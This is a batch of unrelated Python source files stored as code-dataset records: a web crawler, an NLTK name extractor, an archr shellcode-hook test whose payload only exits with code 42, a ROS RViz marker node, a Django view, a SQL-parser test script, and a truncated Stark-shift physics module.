'visited.txt')\n\nnb_of_collected = load_nb('nb_of_collected.txt')\nfrontier_q = load_queue('frontier_q.txt')\nvisited = load_queue('visited.txt')\n# frontier_q = ['http://www.ku.ac.th/web2012/']\n# visited = []\n\nwhile len(frontier_q) > 0 and nb_of_collected < max_nb_of_web_page:\n\tnow_url = frontier_q[0]\n\tprint('.', end='', flush=True)\n\tfrontier_q = frontier_q[1:]\n\tvisited.append(now_url)\n\ttext = ''\n\tif is_robot_allow(now_url) :\n\t\ttext = get_page(now_url)\n\tif len(text) > 0 :\n\t\tcollect_file(now_url, text, 'html/', True)\n\t\tlinks = link_parser(text, now_url)\n\t\tfor link in links :\n\t\t\tif link not in frontier_q and link not in visited :\n\t\t\t\tfrontier_q.append(link)\n\twrite_queue(frontier_q, 'frontier_q.txt')\n\twrite_queue(visited, 'visited.txt')\n\twrite_nb(nb_of_collected, 'nb_of_collected.txt')","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"409968409","text":"import nltk.data\nfrom nltk import sent_tokenize, word_tokenize, pos_tag, ne_chunk\nfrom nameparser.parser import HumanName\nimport csv\n\n#http://stackoverflow.com/questions/20290870/improving-the-extraction-of-human-names-with-nltk\n\nwith open('OTRSiteScrape.txt','r') as text:\n \n for row in text:\n def get_human_names(row):\n tokens = nltk.tokenize.word_tokenize(row.strip())\n pos = nltk.pos_tag(tokens)\n sentt = nltk.ne_chunk(pos, binary = False)\n person_list = []\n person = []\n name = \"\"\n for subtree in sentt.subtrees(filter=lambda t: t.label() == 'PERSON'):\n for leaf in subtree.leaves():\n person.append(leaf[0])\n if len(person) > 1: #avoid grabbing lone surnames\n for part in person:\n name += part + ' '\n if name[:-1] not in person_list:\n person_list.append(name[:-1])\n name = ''\n person = []\n \n return (person_list)\n \n with open('OTRSiteNames.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, quotechar='|', quoting=csv.QUOTE_MINIMAL)\n names = get_human_names(row)\n \n for name in names: \n# last_first = HumanName(name).last + ', ' + HumanName(name).first\n writer.writerow([HumanName(name)])","sub_path":"Extras/NLTK_Parse.py","file_name":"NLTK_Parse.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357428607","text":"import tempfile\nimport shutil\nimport archr\nimport os\n\ndef setup_module():\n os.system(\"cd %s/dockers; ./build_all.sh\" % os.path.dirname(__file__))\n\ndef test_dockerfile_hook():\n with archr.targets.DockerImageTarget('archr-test:entrypoint-false').build().start() as t:\n assert t.run_command().wait() == 1\n with t.shellcode_context(asm_code=\"mov rax, 60; mov rdi, 42; syscall\") as p:\n assert p.wait() == 42\n assert t.run_command().wait() == 1\n\ndef test_local_hook():\n # copy out /bin/false, because we can't overwrite it obviously\n tf = tempfile.mktemp()\n shutil.copy(\"/bin/false\", tf)\n with archr.targets.LocalTarget([tf]).build().start() as t:\n assert t.run_command().wait() == 1\n with t.shellcode_context(asm_code=\"mov rax, 60; mov rdi, 42; syscall\") as p:\n assert p.wait() == 42\n assert t.run_command().wait() == 1\n os.unlink(tf)\n\nif __name__ == '__main__':\n test_dockerfile_hook()\n test_local_hook()\n","sub_path":"tests/test_shellcode_hook.py","file_name":"test_shellcode_hook.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"373403381","text":"#!/usr/bin/env python3\n\nimport rospy\n\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\nfrom laser_line_extraction.msg import LineSegmentList\nfrom geometry_msgs.msg import Point\nimport numpy as np\n\n\n\nclass RvizMarkers():\n def __init__(self):\n rospy.init_node('test_vis')\n rate = rospy.get_param('~rate', 10)\n self.update_rate = rospy.Rate(rate)\n self.line_vis_pub = rospy.Publisher('line_segment_markerarray', MarkerArray, queue_size=10)\n\n # Publishers/subscribers\n self.wall_detection_sub = rospy.Subscriber('/line_segments', LineSegmentList,\n self.wallDetectionCB, queue_size=1)\n self.wall_detection_msg = LineSegmentList()\n\n self.max_i = 0\n\n def wallDetectionCB(self, msg):\n self.wall_detection_msg = msg\n\n def visualizeLineSegments(self):\n marker_array = MarkerArray()\n\n real_idx = 0\n\n for i, line in enumerate(self.wall_detection_msg.line_segments):\n marker = Marker();\n\n # Ignore invalid points\n if np.isnan(line.start[0]):\n continue\n else:\n start_point = Point()\n start_point.x = line.start[0]\n start_point.y = line.start[1]\n end_point = Point()\n end_point.x = line.end[0]\n end_point.y = line.end[1]\n\n marker = Marker();\n marker.header.frame_id = self.wall_detection_msg.header.frame_id;\n marker.header.stamp = rospy.Time.now();\n marker.ns = \"wall_detection\";\n marker.id = real_idx;\n marker.type = Marker.LINE_STRIP;\n marker.action = Marker.ADD;\n # marker.pose.position.x = 1;\n # marker.pose.position.y = 1;\n # marker.pose.position.z = 1;\n marker.pose.orientation.x = 0.0;\n marker.pose.orientation.y = 0.0;\n marker.pose.orientation.z = 0.0;\n marker.pose.orientation.w = 1.0;\n marker.scale.x = 0.03;\n marker.color.a = 1.0; # Don't forget to set the alpha!\n marker.color.r = 0.0;\n marker.color.g = 1.0;\n marker.color.b = 0.0;\n marker.points = [start_point, end_point]\n marker_array.markers.append(marker)\n real_idx += 1\n\n if real_idx > self.max_i:\n self.max_i = real_idx\n\n # Delete old \"ghost\" markers\n for i in range(real_idx, self.max_i+3):\n marker = Marker();\n marker.header.frame_id = self.wall_detection_msg.header.frame_id;\n marker.header.stamp = rospy.Time.now();\n marker.ns = \"wall_detection\";\n marker.id = i;\n marker.action = Marker.DELETE;\n marker_array.markers.append(marker)\n\n self.max_i = real_idx\n self.line_vis_pub.publish(marker_array);\n\n def run(self):\n while not rospy.is_shutdown():\n self.vis_msg = MarkerArray()\n self.visualizeLineSegments()\n self.update_rate.sleep\n\nif __name__ == \"__main__\":\n rviz_markers = RvizMarkers()\n rviz_markers.run()\n","sub_path":"scripts/rviz_markers.py","file_name":"rviz_markers.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"99230634","text":"from django.shortcuts import render\n\ndef home(request):\n search_query = request.GET.get('query', None)\n page_context = {\n 'content_section': 'legal-resources',\n }\n return render(request, 'legal/home.html', {\n 'search_hero_heading': 'Legal resources',\n 'search_query': search_query,\n 'self': page_context\n })\n","sub_path":"fec/legal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"602130788","text":"# coding=utf-8\n# Created by Tian Yuanhao on 2016/4/5.\n# from string import upper\n\nfrom dsl.lexer import lexer\nfrom dsl.parser import parser\nfrom session.abstract_class import PysparkPro\n\ncreate_table_test = \"\"\"\ncreate table A (\n id int,\n name char(10),\n age int,\n grade int\n);\n\"\"\"\n\nselect_test = \"select * from A;\"\n\ninsert_test = \"insert into A values(5, 'c', 33, 24), (6, 'd', 33, 11);\"\n\ndelete_test = \"delete from A where id = 1;\"\n\nupdate_test = \"update A set age = 1 where id = 2;\"\n\nprint_test = \"print A;\"\n\nalert_add_test = \"alert table A add num char(20);\"\n\nalert_drop_test = \"alert table A drop num;\"\n\ndrop_table_test = \"drop table mumu;\"\n\n\ndef test_big():\n f = open(\"test.txt\", 'w')\n for i in range(10000):\n f.write(str(i) + \" \" + str(i) + \"\\n\")\n f.close()\n\n\ndef exec_sql(sql, spark):\n res = parser.parse(sql, lexer=lexer)\n from execute.main import execute_main\n execute_main(res, lexer, spark)\n\n\nif __name__ == '__main__':\n spark = PysparkPro().pysparkpro\n sql = input(\"请输入>\")\n exec_sql(sql, spark)\n# exec_sql(\"drop user tyh password 'tyh';\")\n# exec_sql(\"insert into big values(1, 1), (2 ,2);\")\n\n# exec_sql(\"print B;\")\n# exec_sql(\"select B.id, A.id from B, A where B.id > 2 and B.id > A.id;\")\n","sub_path":"pysparkpro/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31684890","text":"\"\"\"Stefan Spence 13.11.18\r\n17.01.18 -- Run to launch UI to calculate stark shifts in Rb/Cs\r\n\r\nVersion 3: the calculations are in agreement with Arora 2007 when the hyperfine\r\nsplitting can be ignored. However, this version assumes that when hyperfine \r\nsplitting is relevant, it is much larger than the stark shift, so that the\r\nstark shift hamiltonian is diagonal in the hyperfine basis (no state mixing).\r\nThis assumption doesn't hold for the excited states.\r\n\r\nSimulation of atoms in an optical tweezer.\r\n1) Formulate the equations for Gaussian beam propagation.\r\n2) Look at the dipole interaction as a function of laser wavelength and \r\nspatial position\r\n3) calculate the polarisability for a given state at a given wavelength\r\n\r\n14.11.18 add in dipole potential\r\ncalculate the polarisability and compare the 2-level model to including other transitions\r\n\r\n19.11.18 extend polarisability function\r\nnow it allows several laser wavelengths and several resonant transitions \r\nadded Boltzmann's constant to global variables to convert Joules to Kelvin\r\n\r\n20.11.18\r\nmake the polarisability function work for multiple or individual wavelengths\r\ncorrect the denominator in the polarisability function from Delta^2 - Gamma^2\r\nto Delta^2 + Gamma^2\r\n\r\n13.12.18\r\nAllow the dipole.polarisability() to take wavelength as an argument\r\n\r\n18.12.18\r\nThe previous polarisability results did not agree with literature. Since the\r\nstark shift is the priority, load the polarisability from provided data.\r\nAlso must include vector and tensor polarizabilities\r\nsee F. L. Kien et al, Eur. Phys. J. D, 67, 92 (2013)\r\n\r\n21.12.18\r\nSome papers include the Stark shift for hyperfine states (Kien 2013), whereas\r\nothers use just the fine structure (see B. Arora et al, Phys. Rev. A 76, 052509 \r\n(2007))\r\nSo we will incorporate functions for both of them.\r\n\r\n02.01.19\r\nUse arc (see https://arc-alkali-rydberg-calculator.readthedocs.io/en/latest/ ) \r\nto get the data for dipole matrix elements and transition properties\r\n(note that arc gets all its Rb, Cs literature values from Safronova papers:\r\nSafronova et al, PRA 60, 6 (1999)\r\nSafronova et al, PRA 69, 022509 (2004)\r\n\r\n07.01.19\r\nAdd in functions to calculate the polarisability\r\n - when the hyperfine transitions are important (not finished - needs dipole\r\n matrix elements for hyperfine transitions): polarisability()\r\n - when hyperfine transitions can be ignored: polarisabilityJ()\r\nArora 2007 does include hyperfine splittings in a separate equations, so make\r\none acStarkShift() function where hyperfine interactions can be toggled\r\n\r\n08.01.19\r\nRemove the duplicate starkshift/polarisability functions\r\n\r\n14.01.19\r\nGive state labels (n,l,j) to the transition data\r\n\r\n15.01.19\r\nCorrect the polarisability formula (had w - w0 instead of w0 - w)\r\nNote: the arc data doesn't have linewidths for transitions\r\nSince they're usually quite small this usually doesn't make too much of a \r\ndifference [Archived this version]\r\n\r\n16.01.19\r\nRemove functions for loading polarisability data from other papers\r\nStore transition data in dat files so that importing arc is unnecessary\r\n\r\n17.01.19\r\nexplicitly state that the denominator in fractions are floats, otherwise there\r\nis integer division \r\n\r\n23.01.19 \r\nwrite a function to match the figures for polarisability from Arora 2007\r\nCorrect a factor of 1/2 in the polarisability formula to match Arora 2007\r\n\r\n29.01.19\r\nWhen the hyperfine boolean is True, use the formula from Kien 2013\r\n\r\n04.02.19\r\nuse Arora 2007 for hyperfine \r\n\r\n20.03.19\r\nAlso print the polarisability components in getStarkShift()\r\n\r\n27.03.19\r\nWhen looking at excited states with several possible mj values, average\r\nover the possible mj values.\r\n\r\n26.04.19\r\nAdd in a function to calculate the scattering rate at a given wavelength\r\n\r\n20.05.19\r\nFunction to get Stark shift of MF states for Rb or Cs on cooling/repump transition\r\n\r\n08.07.19\r\ninclude the vector polarisability in stark shift calculations\r\n\r\n23.11.19\r\nIntroduce Potassium 41\r\n\r\n16.03.20\r\nReplace wigner functions with ones from sympy\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport os\r\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\r\nfrom math import factorial \r\nfrom matplotlib.ticker import AutoLocator\r\nfrom sympy.physics.wigner import wigner_6j, wigner_3j, clebsch_gordan\r\nimport AtomFieldInt_Example_functions as AFF\r\n\r\n# see https://docs.sympy.org/latest/modules/physics/wigner.html for documentation\r\n# Memoized wigner functions\r\n\r\n# Generic memoization class.\r\nclass Memoize:\r\n def __init__(self, f):\r\n self.f = f\r\n self.memo = {}\r\n\r\n def __call__(self, *args):\r\n if args not in self.memo:\r\n self.memo[args] = self.f(*args)\r\n return self.memo[args]\r\n \r\n@Memoize\r\ndef wigner3j(*args):\r\n return float(wigner_3j(*args))\r\n\r\n@Memoize\r\ndef wigner6j(*args):\r\n return float(wigner_6j(*args))\r\n\r\n# Memoized Clebsch-Gordon function\r\n@Memoize\r\ndef clebschgordan(*args):\r\n return float(clebsch_gordan(*args))\r\n# global constants:\r\nc = 2.99792458e8 # speed of light in m/s\r\neps0 = 8.85419e-12 # permittivity of free space in m^-3 kg^-1 s^4 A^2\r\nh = 6.6260700e-34 # Planck's constant in m^2 kg / s\r\nhbar = 1.0545718e-34 # reduced Planck's constant in m^2 kg / s\r\na0 = 5.29177e-11 # Bohr radius in m\r\ne = 1.6021766208e-19 # magnitude of the charge on an electron in C\r\nme = 9.10938356e-31 # mass of an electron in kg\r\nkB = 1.38064852e-23 # Boltzmann's constant in m^2 kg s^-2 K^-1\r\namu = 1.6605390e-27 # atomic mass unit in kg\r\nEh = me * e**4 /(4. *np.pi *eps0 *hbar)**2 # the Hartree energy\r\nau = e**2 * a0**2 / Eh # atomic unit for polarisability\r\nbohr_magneton = 9.274014e-24\r\n# note that atomic unit au = 4 pi eps0 a0^3\r\n\r\n#####################\r\n \r\n \r\nclass atom:\r\n \"\"\"Properties of an atom: \r\n \r\n The transitions follow the order:\r\n S1/2 -> nP1/2, nP3/2\r\n P1/2 -> nS1/2. nD3/2\r\n P3/2 -> nS1/2, nD3/2, nD5/2\r\n \r\n D0: Dipole matrix elements (C m)\r\n nlj: quantum numbers of the states (n, l, j)\r\n rw: resonant wavelength (m) of transitions \r\n w0: resonant frequency (rad/s) of transitions \r\n lw: natural linewidth (rad/s) of transitions \r\n \"\"\"\r\n def __init__(self, atm = 'None'):\r\n self.atm = atm\r\n \r\n if self.atm == 'None':\r\n raise SyntaxError('Please enter the atom to be used. Available options are Cs133, Rb87, K41.')\r\n sys.exit(1)\r\n\r\n \r\n if atm == 'Cs133':\r\n ######### atomic properties for Cs-133: ##########\r\n # file contains columns: n, l, j, dipole matrix element, wavelength, linewidth\r\n # for the 6S1/2 state:\r\n S1_2 = np.loadtxt(r'.\\TransitionData\\CsS1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 6P1/2 state:\r\n P1_2 = np.loadtxt(r'.\\TransitionData\\CsP1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 6P3/2 state:\r\n P3_2 = np.loadtxt(r'.\\TransitionData\\CsP3_2.dat', delimiter=',', skiprows=1)\r\n self.D0S = S1_2[:,3] # dipole matrix elements from S1/2 state\r\n self.D0P1 = P1_2[:,3] # dipole matrix elements from P1/2 state\r\n self.D0P3 = P3_2[:,3] # dipole matrix elements from P3/2 state\r\n self.nljS = S1_2[:,:3] # (n,l,j) quantum numbers for transitions\r\n self.nljP1 = P1_2[:,:3]\r\n self.nljP3 = P3_2[:,:3]\r\n self.rwS = S1_2[:,4] # resonant wavelengths from S1/2 state (m)\r\n self.rwP1 = P1_2[:,4] # resonant wavelengths from P1/2 state (m)\r\n self.rwP3 = P3_2[:,4] # resonant wavelengths from P3/2 state (m)\r\n self.w0S = 2*np.pi*c / S1_2[:,4]# resonant frequency (rad/s)\r\n self.w0P1 = 2*np.pi*c / P1_2[:,4]\r\n self.w0P3 = 2*np.pi*c / P3_2[:,4]\r\n self.lwS = S1_2[:,5] # natural linewidth from S1/2 (rad/s)\r\n self.lwP1 = P1_2[:,5] # natural linewidth from P1/2 (rad/s)\r\n self.lwP3 = P3_2[:,5] # natural linewidth from P3/2 (rad/s)\r\n self.m = 133*amu\r\n self.I = 7/2\r\n self.X = self.atm\r\n # Values from steck https://steck.us/alkalidata/\r\n self.Ahfs_S = 2.2981579425*1e9 # Magnetic Dipole Constant for S1/2 state (Hz)\r\n self.Ahfs_P1 = 291.920*1e6 # Magnetic Dipole Constant for P1/2 state (Hz)\r\n self.Ahfs_P3 = 50.275*1e6 # Magnetic Dipole Constant for P3/2 state (Hz)\r\n self.Bhfs_P3 = -0.53*1e6 #Electric Quadrupole Constant for for P3/2 state (Hz)\r\n self.gS = 2.0023193043737 #Electron spin g-factor\r\n self.gL = 0.99999587 #Electron orbital g-factor\r\n self.gJS = 2.00254032 #Fine structure Lande g-factor for S1/2\r\n self.gI = -0.00039885395 #Nuclear spin g-factor\r\n self.gJP1 = 0.66590 #Fine structure Lande g-factor for P1/2\r\n self.gJP3 = 1.3340 #Fine structure Lande g-factor for P3/2\r\n \r\n \r\n if atm == 'Rb87':\r\n ######### atomic properties for Rb-87: ###########\r\n # file contains columns: n, l, j, dipole matrix element, wavelength, linewidth\r\n # for the 6S1/2 state:\r\n S1_2 = np.loadtxt(r'.\\TransitionData\\RbS1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 6P1/2 state:\r\n P1_2 = np.loadtxt(r'.\\TransitionData\\RbP1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 6P3/2 state:\r\n P3_2 = np.loadtxt(r'.\\TransitionData\\RbP3_2.dat', delimiter=',', skiprows=1)\r\n \r\n self.D0S = S1_2[:,3] # dipole matrix elements from S1/2 state\r\n self.D0P1 = P1_2[:,3] # dipole matrix elements from P1/2 state\r\n self.D0P3 = P3_2[:,3] # dipole matrix elements from P3/2 state\r\n self.nljS = S1_2[:,:3] # (n,l,j) quantum numbers for transitions\r\n self.nljP1 = P1_2[:,:3]\r\n self.nljP3 = P3_2[:,:3]\r\n self.rwS = S1_2[:,4] # resonant wavelengths from S1/2 state (m)\r\n self.rwP1 = P1_2[:,4] # resonant wavelengths from P1/2 state (m)\r\n self.rwP3 = P3_2[:,4] # resonant wavelengths from P3/2 state (m)\r\n self.w0S = 2*np.pi*c / S1_2[:,4]# resonant frequency (rad/s)\r\n self.w0P1 = 2*np.pi*c / P1_2[:,4]\r\n self.w0P3 = 2*np.pi*c / P3_2[:,4]\r\n self.lwS = S1_2[:,5] # natural linewidth from S1/2 (rad/s)\r\n self.lwP1 = P1_2[:,5] # natural linewidth from P1/2 (rad/s)\r\n self.lwP3 = P3_2[:,5] # natural linewidth from P3/2 (rad/s)\r\n self.m = 87*amu\r\n self.I = 3/2\r\n self.X = self.atm\r\n # Values from steck https://steck.us/alkalidata/\r\n self.Ahfs_S = 3.4173430545215*1e9 # Magnetic Dipole Constant for S1/2 state (Hz)\r\n self.Ahfs_P1 = 408.328*1e6 # Magnetic Dipole Constant for P1/2 state (Hz)\r\n self.Ahfs_P3 = 84.7185*1e6 # Magnetic Dipole Constant for P3/2 state (Hz)\r\n self.Bhfs_P3 = 12.4965*1e6 #Electric Quadrupole Constant for for P3/2 state (Hz) \r\n self.gS = 2.0023193043737 #Electron spin g-factor\r\n self.gL = 0.99999369 #Electron orbital g-factor\r\n self.gI = -0.0009951414 #Nuclear spin g-factor\r\n self.gJS = 2.00233113 #Fine structure Lande g-factor for S1/2\r\n self.gJP1 = 0.666 #Fine structure Lande g-factor for P1/2\r\n self.gJP3 = 1.3362 #Fine structure Lande g-factor for P3/2\r\n \r\n if atm == 'K41':\r\n ######### atomic properties for K-41: ###########\r\n # file contains columns: n, l, j, dipole matrix element, wavelength, linewidth\r\n # for the 4S1/2 state:\r\n S1_2 = np.loadtxt(r'.\\TransitionData\\KS1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 4P1/2 state:\r\n P1_2 = np.loadtxt(r'.\\TransitionData\\KP1_2.dat', delimiter=',', skiprows=1)\r\n \r\n # for the 4P3/2 state:\r\n P3_2 = np.loadtxt(r'.\\TransitionData\\KP3_2.dat', delimiter=',', skiprows=1)\r\n # for the 4S1/2 state:\r\n self.D0S = S1_2[:,3] # dipole matrix elements from S1/2 state\r\n self.D0P1 = P1_2[:,3] # dipole matrix elements from P1/2 state\r\n self.D0P3 = P3_2[:,3] # dipole matrix elements from P3/2 state\r\n self.nljS = S1_2[:,:3] # (n,l,j) quantum numbers for transitions\r\n self.nljP1 = P1_2[:,:3]\r\n self.nljP3 = P3_2[:,:3]\r\n self.rwS = S1_2[:,4] # resonant wavelengths from S1/2 state (m)\r\n self.rwP1 = P1_2[:,4] # resonant wavelengths from P1/2 state (m)\r\n self.rwP3 = P3_2[:,4] # resonant wavelengths from P3/2 state (m)\r\n self.w0S = 2*np.pi*c / S1_2[:,4]# resonant frequency (rad/s)\r\n self.w0P1 = 2*np.pi*c / P1_2[:,4]\r\n self.w0P3 = 2*np.pi*c / P3_2[:,4]\r\n self.lwS = S1_2[:,5] # natural linewidth from S1/2 (rad/s)\r\n self.lwP1 = P1_2[:,5] # natural linewidth from P1/2 (rad/s)\r\n self.lwP3 = P3_2[:,5] # natural linewidth from P3/2 (rad/s)\r\n self.m = 41*amu\r\n self.I = 3/2\r\n self.X = self.atm\r\n # Values from http://www.tobiastiecke.nl/archive/PotassiumProperties.pdf\r\n self.Ahfs_S = 127.0069352*1e6 # Magnetic Dipole Constant for S1/2 state (Hz)\r\n self.Ahfs_P1 = 15.245*1e6 # Magnetic Dipole Constant for P1/2 state (Hz)\r\n self.Ahfs_P3 = 3.363*1e6 # Magnetic Dipole Constant for P3/2 state (Hz)\r\n self.Bhfs_P3 = 3.351*1e6 #Electric Quadrupole Constant for for P3/2 state (Hz)\r\n self.gS = 2.0023193043622 #Electron spin g-factor\r\n self.gL = 1-(9.10938356*1e-31)/self.m #Electron orbital g-factor\r\n self.gI = -0.00007790600 #Nuclear spin g-factor\r\n self.gJS = 2.00229421 #Fine structure Lande g-factor for S1/2\r\n self.gJP1 = 2/3 #Fine structure Lande g-factor for P1/2\r\n self.gJP3 = 4/3 #Fine structure Lande g-factor for P3/2\r\n \r\n if atm == 'Na23':\r\n ######### atomic properties for Na-23: ###########\r\n # file contains columns: n, l, j, dipole matrix element, wavelength, linewidth\r\n # for the 3S1/2 state:\r\n S1_2 = np.loadtxt(r'.\\TransitionData\\NaS1_2.dat', delimiter=',', skiprows=1)\r\n # for the 3P1/2 state:\r\n P1_2 = np.loadtxt(r'.\\TransitionData\\NaP1_2.dat', delimiter=',', skiprows=1)\r\n # for the 3P3/2 state:\r\n P3_2 = np.loadtxt(r'.\\TransitionData\\NaP3_2.dat', delimiter=',', skiprows=1)\r\n # for the 4S1/2 state:\r\n self.D0S = S1_2[:,3] # dipole matrix elements from S1/2 state\r\n self.D0P1 = P1_2[:,3] # dipole matrix elements from P1/2 state\r\n self.D0P3 = P3_2[:,3] # dipole matrix elements from P3/2 state\r\n self.nljS = S1_2[:,:3] # (n,l,j) quantum numbers for transitions\r\n self.nljP1 = P1_2[:,:3]\r\n self.nljP3 = P3_2[:,:3]\r\n self.rwS = S1_2[:,4] # resonant wavelengths from S1/2 state (m)\r\n self.rwP1 = P1_2[:,4] # resonant wavelengths from P1/2 state (m)\r\n self.rwP3 = P3_2[:,4] # resonant wavelengths from P3/2 state (m)\r\n self.w0S = 2*np.pi*c / S1_2[:,4]# resonant frequency (rad/s)\r\n self.w0P1 = 2*np.pi*c / P1_2[:,4]\r\n self.w0P3 = 2*np.pi*c / P3_2[:,4]\r\n self.lwS = S1_2[:,5] # natural linewidth from S1/2 (rad/s)\r\n self.lwP1 = P1_2[:,5] # natural linewidth from P1/2 (rad/s)\r\n self.lwP3 = P3_2[:,5] # natural linewidth from P3/2 (rad/s)\r\n self.m = 23*amu\r\n self.I = 3/2\r\n self.X = self.atm\r\n # Values from https://steck.us/alkalidata/sodiumnumbers.1.6.pdf\r\n self.Ahfs_S = 885.8130644*1e6 # Magnetic Dipole Constant for S1/2 state (Hz)\r\n self.Ahfs_P1 = 94.44*1e6 # Magnetic Dipole Constant for P1/2 state (Hz)\r\n self.Ahfs_P3 = 18.534*1e6 # Magnetic Dipole Constant for P3/2 state (Hz)\r\n self.Bhfs_P3 = 2.724*1e6 #Electric Quadrupole Constant for for P3/2 state (Hz)\r\n self.gS = 2.0023193043737 #Electron spin g-factor\r\n self.gL = 0.9999761 #Electron orbital g-factor\r\n self.gI = -0.0008046108 #Nuclear spin g-factor\r\n self.gJS = 2.0022960 #Fine structure Lande g-factor for S1/2\r\n self.gJP1 = 0.66581 #Fine structure Lande g-factor for P1/2\r\n self.gJP3 = 1.3342 #Fine structure Lande g-factor for P3/2\r\n \r\n if self.atm != 'Cs133' and self.atm != 'Rb87' and self.atm != 'K41'and self.atm != 'Na23':\r\n raise SyntaxError('Please enter a valid atom. Available options are Cs133, Rb87, K41.')\r\n sys.exit(1)\r\n \r\n\r\n#######################\r\n\r\n\r\nclass Gauss:\r\n \"\"\"Properties and associated equations of a Gaussian beam\"\"\"\r\n def __init__(self, wavelength, power, beam_waist, polarization=(0,0,1)):\r\n self.lam = wavelength # wavelength of the laser light (in metres)\r\n self.P = power # total power of the beam (in Watts)\r\n self.w0 = beam_waist # the beam waist defines the laser mode (in metres)\r\n self.I = 2 * power / np.pi / beam_waist**2 # intensity of beam (in Watts/metre squared)\r\n self.ehat= polarization # the direction of polarization (assume linear)\r\n # note: we will mostly ignore polarization since the induced dipole \r\n # moment will be proportional to the direction of the field\r\n \r\n # assume that the beam waist is positioned at z0 = 0\r\n \r\n # from these properties we can deduce:\r\n self.zR = np.pi * beam_waist**2 / wavelength # the Rayleigh range\r\n # average intensity of sinusoidal wave gives the factor of 2\r\n self.E0 = 2 * np.sqrt(power / eps0 / c / np.pi)/beam_waist # field amplitude at the origin\r\n self.k = 2 * np.pi / wavelength # the wave vector\r\n \r\n def amplitude(self, x, y, z):\r\n \"\"\"Calculate the amplitude of the Gaussian beam at a given position\r\n note that this function will not work if several coordinates are 1D arrays\r\n instead, loop over the other coordinates so that there is only ever one\r\n coordinate as an array.\"\"\"\r\n rhosq = x**2 + y**2 # radial coordinate squared \r\n q = z - 1.j * self.zR # complex beam parameter\r\n \r\n # Gaussian beam equation (see Optics f2f Eqn 11.7)\r\n return self.zR /1.j /q * self.E0 * np.exp(1j * self.k * z) * np.exp(\r\n 1j * self.k * rhosq / 2. / q)\r\n \r\n\r\n#######################\r\n \r\n \r\nclass dipole:\r\n \"\"\"Properties and equations of the dipole interaction between atom and field\"\"\"\r\n def __init__(self, ATOM, spin_state, field_properties):\r\n \r\n self.L, self.J, self.F, self.MF = spin_state # spin quantum numbers L, J, F, M_F\r\n if self.L == 0: #S1/2 state\r\n self.Ahfs = ATOM.Ahfs_S # magnetic dipole constant\r\n self.Bhfs = 0 # electric quadrupole constant\r\n self.states = ATOM.nljS # (n,l,j) quantum numbers for transitions\r\n self.omega0 = np.array(ATOM.w0S) # resonant frequencies (rad/s)\r\n self.gam = np.array(ATOM.lwS) # spontaneous decay rate (s)\r\n self.D0s = np.array(ATOM.D0S) # D0 = -e for displacement r along the polarization direction\r\n self.gJ = ATOM.gJS\r\n else:\r\n if self.J == 1/2.:#P1/2 state\r\n self.Ahfs = ATOM.Ahfs_P1 # magnetic dipole constant\r\n self.Bhfs = 0 # electric quadrupole constant\r\n self.states = ATOM.nljP1 # (n,l,j) quantum numbers for transitions\r\n self.omega0 = np.array(ATOM.w0P1) # resonant frequencies (rad/s)\r\n self.gam = np.array(ATOM.lwP1) # spontaneous decay rate (s)\r\n self.D0s = np.array(ATOM.D0P1) # D0 = -e for displacement r along the polarization direction\r\n self.gJ = ATOM.gJP1\r\n else: #P3/2 state\r\n self.Ahfs = ATOM.Ahfs_P3 # magnetic dipole constant\r\n self.Bhfs = ATOM.Bhfs_P3 # electric quadrupole constant\r\n self.states = ATOM.nljP3 # (n,l,j) quantum numbers for transitions\r\n self.omega0 = np.array(ATOM.w0P3) # resonant frequencies (rad/s)\r\n self.gam = np.array(ATOM.lwP3) # spontaneous decay rate (s)\r\n self.D0s = np.array(ATOM.D0P3) # D0 = -e for displacement r along the polarization direction\r\n self.gJ = ATOM.gJP3\r\n \r\n \r\n self.m = ATOM.m # mass of the atom in kg\r\n self.gI = ATOM.gI\r\n self.gS = ATOM.gS\r\n self.gL = ATOM.gL\r\n self.I = ATOM.I # nuclear spin quantum number I\r\n self.field = Gauss(*field_properties) # combines all properties of the field\r\n self.X = ATOM.X\r\n if self.X == 'Cs133':\r\n self.Isats = np.array([24.981, 11.023]) # saturation intensities for D1, D2 transitions\r\n self.Dlws = np.array([ATOM.lwS[0], ATOM.lwS[35]]) # linewidths for D1, D2 lines\r\n self.Drws = np.array([ATOM.rwS[0], ATOM.rwS[35]]) # resonant wavelengths of D1, D2 lines\r\n elif self.X == 'Rb87':\r\n self.Isats = np.array([44.84, 25.03]) # saturation intensities for D1, D2 transitions\r\n self.Dlws = np.array([ATOM.lwS[0], ATOM.lwS[5]]) # linewidths for D1, D2 lines\r\n self.Drws = np.array([ATOM.rwS[0], ATOM.rwS[5]]) # resonant wavelengths of D1, D2 lines\r\n \r\n \r\n self.omegas = np.array(2*np.pi*c/self.field.lam)# laser frequencies (rad/s)\r\n \r\n def scatRate(self, wavel=[], I=[]):\r\n \"\"\"Return the scattering rate at a given wavelength and intensity\r\n Default uses the dipole object's wavelength and intensity\r\n If wavelength and intensity are supplied, they should be the same length.\"\"\"\r\n if np.size(wavel) != 0: \r\n omegas = np.array(2*np.pi*c/wavel) # laser frequencies (rad/s)\r\n else:\r\n omegas = self.omegas\r\n if np.size(I) == 